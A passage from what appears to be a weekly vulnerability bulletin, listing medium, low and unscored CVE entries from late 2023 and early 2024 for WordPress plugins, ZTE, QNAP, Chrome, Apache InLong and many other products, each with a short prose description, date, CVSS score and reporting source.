wordpress — wordpress The WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.5. This is due to missing or incorrect nonce validation on the ‘delete’ action of the wp-sms-subscribers page. This makes it possible for unauthenticated attackers to delete subscribers via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2024-01-03 4.3 CVE-2023-6980
security@wordfence.com
security@wordfence.com
security@wordfence.com
wordpress — wordpress The WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the print_packinglist action in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to export orders which can contain sensitive information. 2024-01-03 4.3 CVE-2023-7068
security@wordfence.com
security@wordfence.com
zte — red_magic_8_pro Permissions and Access Control Vulnerability in ZTE Red Magic 8 Pro 2024-01-04 6.6 CVE-2023-41784
psirt@zte.com.cn
zte — zxcloud_irai There is a local privilege escalation vulnerability in ZTE’s ZXCLOUD iRAI. Attackers with regular user privileges can create a fake process to escalate local privileges. 2024-01-03 6.7 CVE-2023-41776
psirt@zte.com.cn
zte — zxcloud_irai There is an unsafe DLL loading vulnerability in ZTE ZXCLOUD iRAI. Because the program fails to adequately validate the user’s input, an attacker could exploit this vulnerability to escalate local privileges. 2024-01-03 6.4 CVE-2023-41780
psirt@zte.com.cn
zte — zxcloud_irai There is an illegal memory access vulnerability in ZTE’s ZXCLOUD iRAI product. When the vulnerability is exploited by an attacker with the common user permission, the physical machine will crash. 2024-01-03 4.4 CVE-2023-41779
psirt@zte.com.cn
zte — zxcloud_irai There is a command injection vulnerability in ZTE’s ZXCLOUD iRAI. Because the program fails to adequately validate the user’s input, an attacker could exploit this vulnerability to escalate local privileges. 2024-01-03 4.3 CVE-2023-41783
psirt@zte.com.cn


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
acumos — design_studio A vulnerability, which was classified as problematic, was found in Acumos Design Studio up to 2.0.7. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The name of the patch is 0df8a5e8722188744973168648e4c74c69ce67fd. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249420. 2024-01-02 3.5 CVE-2018-25097
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
collective_idea, inc. — audited A race condition exists in Audited 4.0.0 to 5.3.3 that can allow an authenticated user to cause audit log entries to be attributed to another user. 2024-01-04 3.1 CVE-2024-22047
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Open Redirect vulnerability which could allow an attacker to redirect users to malicious sites, potentially leading to phishing attacks or other security threats. 2024-01-03 3.7 CVE-2023-50345
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an information disclosure vulnerability. Certain endpoints within the application disclose detailed file information. 2024-01-03 3.1 CVE-2023-50346
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an improper error handling vulnerability. The application returns detailed error messages that can provide an attacker with insight into the application, system, etc. 2024-01-03 3.1 CVE-2023-50348
psirt@hcl.com
huiran — host_reseller_system A vulnerability classified as problematic has been found in HuiRan Host Reseller System up to 2.0.0. Affected is an unknown function of the file /user/index/findpass?do=4 of the component HTTP POST Request Handler. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249444. 2024-01-02 3.7 CVE-2024-0186
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
libssh — libssh A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter. 2024-01-03 3.9 CVE-2023-6004
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
mattermost — mattermost Mattermost fails to update the permissions of the current session for a user who was just demoted to guest, allowing freshly demoted guests to change group names. 2024-01-02 3.7 CVE-2023-50333
responsibledisclosure@mattermost.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability, which was classified as problematic, was found in RRJ Nueva Ecija Engineer Online Portal 1.0. This affects an unknown part of the file change_password_teacher.php. The manipulation leads to weak password requirements. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-249501 was assigned to this vulnerability. 2024-01-02 3.1 CVE-2024-0188
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability has been found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This vulnerability affects unknown code of the file teacher_message.php of the component Create Message Handler. The manipulation of the argument Content with the input leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249502 is the identifier assigned to this vulnerability. 2024-01-02 3.5 CVE-2024-0189
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0 and classified as problematic. This issue affects some unknown processing of the file add_quiz.php of the component Quiz Handler. The manipulation of the argument Quiz Title/Quiz Description with the input leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249503. 2024-01-02 3.5 CVE-2024-0190
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/admin_user.php of the component Admin Panel. The manipulation of the argument Firstname/Lastname/Username leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249433 was assigned to this vulnerability. 2024-01-01 2.4 CVE-2024-0181
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been classified as problematic. This affects an unknown part of the file /admin/students.php of the component NIA Office. The manipulation leads to basic cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249441 was assigned to this vulnerability. 2024-01-01 2.4 CVE-2024-0183
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nueva_ecija_engineer_online_portal — nueva_ecija_engineer_online_portal A vulnerability was found in RRJ Nueva Ecija Engineer Online Portal 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/edit_teacher.php of the component Add Enginer. The manipulation of the argument Firstname/Lastname leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249442 is the identifier assigned to this vulnerability. 2024-01-02 2.4 CVE-2024-0184
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
openharmony — openharmony OpenHarmony v3.2.2 and prior versions allow a local attacker to cause a multimedia audio crash by modifying a released pointer. 2024-01-02 3.3 CVE-2023-49142
scy@openharmony.io
packagekit — packagekit A use-after-free flaw was found in PackageKitd. In some conditions, the order of cleanup mechanics for a transaction could be impacted. As a result, some memory access could occur on memory regions that were previously freed. Once freed, a memory region can be reused for other allocations and any previously stored data in this memory region is considered lost. 2024-01-03 3.3 CVE-2024-0217
secalert@redhat.com
secalert@redhat.com
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45039
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45040
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45041
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45042
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45043
security@qnapsecurity.com.tw
qnap_systems_inc. — qts/quts_hero A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QuTS hero h5.1.4.2596 build 20231128 and later 2024-01-05 3.8 CVE-2023-45044
security@qnapsecurity.com.tw
qnap_systems_inc. — qumagie A SQL injection vulnerability has been reported to affect QuMagie. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network. We have already fixed the vulnerability in the following version: QuMagie 2.2.1 and later 2024-01-05 3.5 CVE-2023-47219
security@qnapsecurity.com.tw
samsung_mobile — samsung_email Implicit intent hijacking vulnerability in Samsung Email prior to version 6.1.90.16 allows attacker to get sensitive information. 2024-01-04 3.3 CVE-2024-20807
mobile.security@samsung.com
samsung_mobile — samsung_mobile_devices Path traversal vulnerability in ZipCompressor of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows attackers to write arbitrary file. 2024-01-04 3.3 CVE-2024-20805
mobile.security@samsung.com
wordpress — wordpress A vulnerability was found in rt-prettyphoto Plugin up to 1.2 on WordPress and classified as problematic. Affected by this issue is the function royal_prettyphoto_plugin_links of the file rt-prettyphoto.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3 is able to address this issue. The patch is identified as 0d3d38cfa487481b66869e4212df1cefc281ecb7. It is recommended to upgrade the affected component. VDB-249422 is the identifier assigned to this vulnerability. 2024-01-02 3.5 CVE-2015-10128
cna@vuldb.com
wordpress — wordpress URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability in SolidWP Solid Security – Password, Two Factor Authentication, and Brute Force Protection. This issue affects Solid Security – Password, Two Factor Authentication, and Brute Force Protection through 8.1.4. 2023-12-29 3.7 CVE-2023-28786
audit@patchstack.com
zimbra — zm-ajax A vulnerability has been found in Zimbra zm-ajax up to 8.8.1 and classified as problematic. Affected by this vulnerability is the function XFormItem.prototype.setError of the file WebRoot/js/ajax/dwt/xforms/XFormItem.js. The manipulation of the argument message leads to cross site scripting. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 8.8.2 is able to address this issue. The identifier of the patch is 8d039d6efe80780adc40c6f670c06d21de272105. It is recommended to upgrade the affected component. The identifier VDB-249421 was assigned to this vulnerability. 2024-01-02 2.6 CVE-2017-20188
cna@vuldb.com
zte — zxcloud_irai There is a DLL hijacking vulnerability in ZTE ZXCLOUD iRAI, an attacker could place a fake DLL file in a specific directory and successfully exploit this vulnerability to execute malicious code. 2024-01-05 3.9 CVE-2023-41782
psirt@zte.com.cn


Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
abo.cms — abo.cms SQL Injection vulnerability in ABO.CMS v.5.9.3, allows remote attackers to execute arbitrary code via the d parameter in the Documents module. 2024-01-06 not yet calculated CVE-2023-46953
cve@mitre.org
aoyun_technology — pbootcms Aoyun Technology pbootcms V3.1.2 is vulnerable to Incorrect Access Control, which allows remote attackers to gain sensitive information via session leakage and allows a user to avoid logging into the backend management platform. 2024-01-04 not yet calculated CVE-2023-50082
cve@mitre.org
apache — inlong Improper Control of Generation of Code (‘Code Injection’) vulnerability in Apache InLong. This issue affects Apache InLong: from 1.5.0 through 1.9.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong’s 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9329 2024-01-03 not yet calculated CVE-2023-51784
security@apache.org
apache — inlong Deserialization of Untrusted Data vulnerability in Apache InLong. This issue affects Apache InLong: from 1.7.0 through 1.9.0, the attackers can make an arbitrary file read attack using mysql driver. Users are advised to upgrade to Apache InLong’s 1.10.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9331 2024-01-03 not yet calculated CVE-2023-51785
security@apache.org
apache — openoffice Apache OpenOffice documents can contain links that call internal macros with arbitrary arguments. Several URI Schemes are defined for this purpose. Links can be activated by clicks, or by automatic document events. The execution of such links must be subject to user approval. In the affected versions of OpenOffice, approval for certain links is not requested; when activated, such links could therefore result in arbitrary script execution. This is a corner case of CVE-2022-47502. 2023-12-29 not yet calculated CVE-2023-47804
security@apache.org
apiida_ag — api_gateway_manager APIIDA API Gateway Manager for Broadcom Layer7 v2023.2 is vulnerable to Cross Site Scripting (XSS). 2024-01-03 not yet calculated CVE-2023-50092
cve@mitre.org
apiida_ag — api_gateway_manager APIIDA API Gateway Manager for Broadcom Layer7 v2023.2.2 is vulnerable to Host Header Injection. 2024-01-03 not yet calculated CVE-2023-50093
cve@mitre.org
autel_robotics — evo_nano Autel EVO NANO drone flight control firmware version 1.6.5 is vulnerable to denial of service (DoS). 2024-01-06 not yet calculated CVE-2023-50121
cve@mitre.org
automatic_systems — soc_fl9600_fastline Directory Traversal in Automatic-Systems SOC FL9600 FastLine lego_T04E00 allows a remote attacker to obtain sensitive information. 2024-01-03 not yet calculated CVE-2023-37607
cve@mitre.org
automatic_systems — soc_fl9600_fastline An issue in Automatic Systems SOC FL9600 FastLine v.lego_T04E00 allows a remote attacker to obtain sensitive information via the admin login credentials. 2024-01-03 not yet calculated CVE-2023-37608
cve@mitre.org
ava_teaching_video_application — ava_teaching_video_application Cross Site Scripting (XSS) vulnerability in AVA teaching video application service platform version 3.1, allows remote attackers to execute arbitrary code via a crafted script to ajax.aspx. 2024-01-06 not yet calculated CVE-2023-50609
cve@mitre.org
brave_software,_inc. — brave_browser Brave Browser before 1.59.40 does not properly restrict the schema for WebUI factory and redirect. This is related to browser/brave_content_browser_client.cc and browser/ui/webui/brave_web_ui_controller_factory.cc. 2023-12-30 not yet calculated CVE-2023-52263
cve@mitre.org
cesanta_software — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_getretvalpos function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49549
cve@mitre.org
cesanta_software — mjs An Out of Bounds Write in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_op_json_stringify function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49552
cve@mitre.org
cesanta_software — mjs An issue in Cesanta mjs 2.20.0 allows a remote attacker to cause a denial of service via the mjs_destroy function in the msj.c file. 2024-01-02 not yet calculated CVE-2023-49553
cve@mitre.org
cetic-6lbr — cetic-6lbr examples/6lbr/apps/6lbr-webserver/httpd.c in CETIC-6LBR (aka 6lbr) 1.5.0 has a strcat stack-based buffer overflow via a request for a long URL over a 6LoWPAN network. 2023-12-31 not yet calculated CVE-2021-46901
cve@mitre.org
cherry — cherry handle_request in http.c in cherry through 4b877df has an sscanf stack-based buffer overflow via a long URI, leading to remote code execution. 2024-01-05 not yet calculated CVE-2024-22086
cve@mitre.org
class.upload.php — class.upload.php As a simple library, class.upload.php does not perform an in-depth check on uploaded files, allowing a stored XSS vulnerability when the default configuration is used. Developers must be aware of that fact and use extension whitelisting accompanied by forcing the server to always provide content-type based on the file extension. The README has been updated to include these guidelines. 2024-01-04 not yet calculated CVE-2023-6551
cvd@cert.pl
cmark-gfm — cmark-gfm CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns. 2024-01-04 not yet calculated CVE-2024-22051
disclosure@vulncheck.com
dzzoffice — dzzoffice SQL Injection vulnerability in Dzzoffice version 2.01, allows remote attackers to obtain sensitive information via the doobj and doevent parameters in the Network Disk backend module. 2024-01-06 not yet calculated CVE-2023-39853
cve@mitre.org
ehttp — ehttp ehttp 1.0.6 before 17405b9 has an epoll_socket.cpp read_func use-after-free. An attacker can make many connections over a short time to trigger this. 2023-12-31 not yet calculated CVE-2023-52266
cve@mitre.org
ehttp — ehttp ehttp 1.0.6 before 17405b9 has a simple_log.cpp _log out-of-bounds-read during error logging for long strings. 2023-12-31 not yet calculated CVE-2023-52267
cve@mitre.org
encoded_id-rails — encoded_id-rails encoded_id-rails versions before 1.0.0.beta2 are affected by an uncontrolled resource consumption vulnerability. A remote and unauthenticated attacker might cause a denial-of-service condition by sending an HTTP request with an extremely long “id” parameter. 2024-01-04 not yet calculated CVE-2024-0241
disclosure@vulncheck.com
firefly-iii — firefly-iii Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection. 2024-01-05 not yet calculated CVE-2024-22075
cve@mitre.org
fit2cloud — cloud_explorer_lite Insecure Permissions vulnerability in fit2cloud Cloud Explorer Lite version 1.4.1, allow local attackers to escalate privileges and obtain sensitive information via the cloud accounts parameter. 2024-01-06 not yet calculated CVE-2023-50612
cve@mitre.org
floorsight_software_llc — customer_portal_q3_2023 An indirect Object Reference (IDOR) in the Order and Invoice pages in Floorsight Customer Portal Q3 2023 allows an unauthenticated remote attacker to view sensitive customer information. 2024-01-02 not yet calculated CVE-2023-45893
cve@mitre.org
floorsight_software_llc — insights_q3_2023 An issue discovered in the Order and Invoice pages in Floorsight Insights Q3 2023 allows an unauthenticated remote attacker to view sensitive customer information. 2024-01-02 not yet calculated CVE-2023-45892
cve@mitre.org
flycms — flycms FlyCms through abbaa5a allows XSS via the permission management feature. 2024-01-01 not yet calculated CVE-2024-21732
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.32 for Intel SGX. Lack of pointer-alignment validation logic in entry functions allows a local attacker to access unauthorized information. This relates to the enclave_ecall function and system call layer. 2023-12-30 not yet calculated CVE-2023-38021
cve@mitre.org
fortanix — enclaveos_confidential_computing_manager An issue was discovered in Fortanix EnclaveOS Confidential Computing Manager (CCM) Platform before 3.29 for Intel SGX. Insufficient pointer validation allows a local attacker to access unauthorized information. This relates to strlen and sgx_is_within_user. 2023-12-30 not yet calculated CVE-2023-38022
cve@mitre.org
gila_cms — gila_cms SQL Injection vulnerability discovered in Gila CMS 1.15.4 and earlier allows a remote attacker to execute arbitrary web scripts via the Area parameter under the Administration>Widget tab after the login portal. 2024-01-02 not yet calculated CVE-2020-26623
cve@mitre.org
gila_cms — gila_cms A SQL injection vulnerability was discovered in Gila CMS 1.15.4 and earlier which allows a remote attacker to execute arbitrary web scripts via the ID parameter after the login portal. 2024-01-02 not yet calculated CVE-2020-26624
cve@mitre.org
gila_cms — gila_cms A SQL injection vulnerability was discovered in Gila CMS 1.15.4 and earlier which allows a remote attacker to execute arbitrary web scripts via the ‘user_id’ parameter after the login portal. 2024-01-02 not yet calculated CVE-2020-26625
cve@mitre.org
gl.inet — multiple_products An issue was discovered on GL.iNet devices through 4.5.0. Attackers can invoke the add_user interface in the system module to gain root privileges. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7. 2024-01-03 not yet calculated CVE-2023-50921
cve@mitre.org
gl.inet — multiple_products An issue was discovered on GL.iNet devices through 4.5.0. Attackers who are able to steal the AdminToken cookie can execute arbitrary code by uploading a crontab-formatted file to a specific directory and waiting for its execution. This affects A1300 4.4.6, AX1800 4.4.6, AXT1800 4.4.6, MT3000 4.4.6, MT2500 4.4.6, MT6000 4.5.0, MT1300 4.3.7, MT300N-V2 4.3.7, AR750S 4.3.7, AR750 4.3.7, AR300M 4.3.7, and B1300 4.3.7. 2024-01-03 not yet calculated CVE-2023-50922
cve@mitre.org
google — chrome Use after free in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0222
chrome-cve-admin@google.com
google — chrome Heap buffer overflow in ANGLE in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0223
chrome-cve-admin@google.com
google — chrome Use after free in WebAudio in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0224
chrome-cve-admin@google.com
google — chrome Use after free in WebGPU in Google Chrome prior to 120.0.6099.199 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) 2024-01-04 not yet calculated CVE-2024-0225
chrome-cve-admin@google.com
govuk_tech_docs — govuk_tech_docs govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user’s browser if a malicious search result is displayed on the search page. 2024-01-04 not yet calculated CVE-2024-22048
disclosure@vulncheck.com
gpac — gpac An issue discovered in GPAC 2.3-DEV-rev605-gfc9e29089-master in MP4Box in gf_avc_change_vui /afltest/gpac/src/media_tools/av_parsers.c:6872:55 allows attackers to crash the application. 2024-01-03 not yet calculated CVE-2023-46929
cve@mitre.org
httparty — httparty httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written. 2024-01-04 not yet calculated CVE-2024-22049
disclosure@vulncheck.com
idurar-erp-crm — idurar-erp-crm IDURAR (aka idurar-erp-crm) through 2.0.1 allows stored XSS via a PATCH request with a crafted JSON email template in the /api/email/update data. 2023-12-30 not yet calculated CVE-2023-52265
cve@mitre.org
ifair — ifair Directory Traversal vulnerability in fuwushe.org iFair versions 23.8_ad0 and before allows an attacker to obtain sensitive information via a crafted script. 2024-01-03 not yet calculated CVE-2023-47473
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+27ef heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13878
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+214f heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13879
cve@mitre.org
ifranview — ifranview IrfanView B3D PlugIns before version 4.56 has a B3d.dll!+1cbf heap-based out-of-bounds write. 2024-01-05 not yet calculated CVE-2020-13880
cve@mitre.org
iodine — iodine Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs. 2024-01-04 not yet calculated CVE-2024-22050
disclosure@vulncheck.com
jeecg — jeecg Deserialization of Untrusted Data in jeecgFormDemoController in JEECG 4.0 and earlier allows attackers to run arbitrary code via crafted POST request. 2024-01-03 not yet calculated CVE-2023-49442
cve@mitre.org
jizhicms — jizhicms Jizhicms v2.5 was discovered to contain an arbitrary file download vulnerability via the component /admin/c/PluginsController.php. 2024-01-04 not yet calculated CVE-2023-51154
cve@mitre.org
jupyter_notebook_viewer — nbviewer_app nbviewer-app (aka Jupyter Notebook Viewer) before 0.1.6 has the get-task-allow entitlement for release builds. 2024-01-05 not yet calculated CVE-2023-51277
cve@mitre.org
kantega_software_corp. — kantega_sso The Kantega SAML SSO OIDC Kerberos Single Sign-on apps before 6.20.0 for Atlassian products allow XSS if SAML POST Binding is enabled. This affects 4.4.2 through 4.14.8 before 4.14.9, 5.0.0 through 5.11.4 before 5.11.5, and 6.0.0 through 6.19.0 before 6.20.0. The full product names are Kantega SAML SSO OIDC Kerberos Single Sign-on for Jira Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Confluence Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bitbucket Data Center & Server (Kantega SSO Enterprise), Kantega SAML SSO OIDC Kerberos Single Sign-on for Bamboo Data Center & Server (Kantega SSO Enterprise), and Kantega SAML SSO OIDC Kerberos Single Sign-on for FeCru Server (Kantega SSO Enterprise). (Here, FeCru refers to the Atlassian Fisheye and Crucible products running together.) 2023-12-29 not yet calculated CVE-2023-52240
cve@mitre.org
layui — layui layui up to v2.74 was discovered to contain a cross-site scripting (XSS) vulnerability via the data-content parameter. 2023-12-30 not yet calculated CVE-2023-50550
cve@mitre.org
linux — kernel Closing of an event channel in the Linux kernel can result in a deadlock. This happens when the close is being performed in parallel to an unrelated Xen console action and the handling of a Xen console interrupt in an unprivileged guest. The closing of an event channel is e.g. triggered by removal of a paravirtual device on the other side. As this action will cause console messages to be issued on the other side quite often, the chance of triggering the deadlock is not neglectable. Note that 32-bit Arm-guests are not affected, as the 32-bit Linux kernel on Arm doesn’t use queued-RW-locks, which are required to trigger the issue (on Arm32 a waiting writer doesn’t block further readers to get the lock). 2024-01-05 not yet calculated CVE-2023-34324
security@xen.org
little-backup-box — little-backup-box outdoorbits little-backup-box (aka Little Backup Box) before f39f91c allows remote attackers to execute arbitrary code because the PHP extract function is used for untrusted input. 2023-12-30 not yet calculated CVE-2023-52262
cve@mitre.org
lotos_webserver — lotos_webserver Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled. 2024-01-05 not yet calculated CVE-2024-22088
cve@mitre.org
ly_corp. — line_app An issue in Tamaki_hamanoki Line v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2024-01-03 not yet calculated CVE-2023-45559
cve@mitre.org
ly_corp. — line_app An issue in A-WORLD OIRASE BEER_waiting Line v.13.6.1 allows attackers to send crafted notifications via leakage of the channel access token. 2024-01-02 not yet calculated CVE-2023-45561
cve@mitre.org
mingsoft_mcms — mingsoft_mcms Mingsoft MCMS v5.2.9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list.do. 2023-12-30 not yet calculated CVE-2023-50578
cve@mitre.org
newtonsoft.json — newtonsoft.json Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial-of-service condition. 2024-01-03 not yet calculated CVE-2024-21907
disclosure@vulncheck.com
npmjs — npmjs A host header injection vulnerability exists in the NPM package @perfood/couch-auth versions <= 0.20.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users’ passwords and take over their accounts. 2024-01-03 not yet calculated CVE-2023-39655
cve@mitre.org
o-ran_software_community — o-ran_software_community An issue was discovered in O-RAN Software Community ric-plt-e2mgr in the G-Release environment, allows remote attackers to cause a denial of service (DoS) via a crafted request to the E2Manager API component. 2024-01-03 not yet calculated CVE-2023-42358
cve@mitre.org
open5gs — open5gs An issue was discovered in open5gs v2.6.6. InitialUEMessage, Registration request sent at a specific time can crash AMF due to incorrect error handling of Nudm_UECM_Registration response. 2024-01-02 not yet calculated CVE-2023-50019
cve@mitre.org
open5gs — open5gs An issue was discovered in open5gs v2.6.6. SIGPIPE can be used to crash AMF. 2024-01-02 not yet calculated CVE-2023-50020
cve@mitre.org
petero.cbor — petero.cbor PeterO.Cbor versions 4.0.0 through 4.5.0 are vulnerable to a denial-of-service vulnerability. An attacker may trigger the denial-of-service condition by providing crafted data to the DecodeFromBytes or other decoding mechanisms in PeterO.Cbor. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial-of-service condition. 2024-01-03 not yet calculated CVE-2024-21909
disclosure@vulncheck.com
pico — pico route in main.c in Pico HTTP Server in C through f3b69a6 has a sprintf stack-based buffer overflow via a long URI, leading to remote code execution. 2024-01-05 not yet calculated CVE-2024-22087
cve@mitre.org
plotly — plotly In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty. 2024-01-03 not yet calculated CVE-2023-46308
cve@mitre.org
prestashop — prestashop SQL Injection vulnerability in Buy Addons baproductzoommagnifier module for PrestaShop versions 1.0.16 and before, allows remote attackers to escalate privileges and gain sensitive information via BaproductzoommagnifierZoomModuleFrontController::run() method. 2024-01-05 not yet calculated CVE-2023-50027
cve@mitre.org
